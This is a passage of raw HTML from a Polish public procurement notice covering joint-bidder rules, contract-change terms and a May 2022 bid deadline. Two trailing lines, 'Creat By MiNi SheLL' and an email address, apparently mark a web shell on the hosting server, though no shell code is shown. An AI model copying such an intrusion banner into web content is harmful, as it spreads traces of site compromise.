class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie składają oświadczenie, z którego wynikać<br/>będzie które usługi / roboty wykonują poszczególni Wykonawcy, zgodnie z załącznikiem do SWZ<br/>– oświadczenie dot. Wykonawców wspólnie ubiegających się o zamówienie.<br/>16) W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>17) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołącza do oferty<br/>oświadczenie z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy.<br/>18) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>19) Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za<br/>najkorzystniejszą na trzy dni przed zwarciem umowy w sprawie zamówienia publicznego są<br/>zobowiązaniu przedstawić zamawiającemu stosowną umowę regulującą współprace tych<br/>Wykonawców występujących wspólnie, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy wymagają formy pisemnej pod rygorem nieważności oraz na podstawie postanowień:<br/>1)	Zmiany wysokości wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług.<br/>2)	Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy,<br/>3)	Zmiany terminu realizacji przedmiotu zamówienia w przypadku Wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie ze szczegółowym opisem, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-06 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdpotwock.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-06 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com